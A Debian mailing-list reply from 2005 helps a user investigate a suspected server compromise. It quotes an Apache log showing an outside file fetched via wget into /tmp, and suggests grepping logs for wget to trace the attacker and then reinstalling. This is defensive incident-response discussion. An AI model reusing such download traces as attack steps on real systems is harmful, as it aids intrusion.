Re: Am I Compromised -- Some interesting findings

To: Ritesh Raj Sarraf <rrs@researchut.com>
Cc: debian-isp@lists.debian.org
Subject: Re: Am I Compromised -- Some interesting findings
From: Steve Kemp <skx@debian.org>
Date: Fri, 25 Nov 2005 16:57:27 +0000
Message-id: <[🔎] 20051125165727.GA22967@steve.org.uk>
Reply-to: Steve Kemp <skx@debian.org>
In-reply-to: <[🔎] dm7eu1$rj6$1@sea.gmane.org>
References: <[🔎] dm7eu1$rj6$1@sea.gmane.org>

On Fri, Nov 25, 2005 at 10:12:25PM +0530, Ritesh Raj Sarraf wrote:

> Now let's look a little of /var/log/apache2/error.log:
> 
> Resolving maple.phpwebhosting.com... 70.86.76.34
> Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 18,698 [text/plain]
> 
>     0K .......... ........                                   100%  210.37
> KB/s

  Looks like it was downloaded via wget.

  Run "grep wget /var/log/apache/access.log" - that should give you the
 IP address of the attackign host.

  It might be worth posting any matching lines; that way somebody might
 be able to tell you which script (cgi/php/etc) was used as the attack
 vector.

  Definitely a time to wipe, reinstall and import your backups though.

> The logs show that the guy uploaded the files to /tmp and hid them.

  Indeed, but we need to find out what allowed them to do so -
  presumably something insecure running upon your host.  Untill you know
  what it was reinstalling will not prevent it from happening again.

Steve
--

Reply to:

Follow-Ups:
- Re: Am I Compromised -- Some interesting findings
  - From: Ritesh Raj Sarraf <rrs@researchut.com>

References:
- Am I Compromised -- Some interesting findings
  - From: Ritesh Raj Sarraf <rrs@researchut.com>

Prev by Date: Am I Compromised -- Some interesting findings
Next by Date: Re: Am I Compromised -- Some interesting findings
Previous by thread: Am I Compromised -- Some interesting findings
Next by thread: Re: Am I Compromised -- Some interesting findings
Index(es):
- Date
- Thread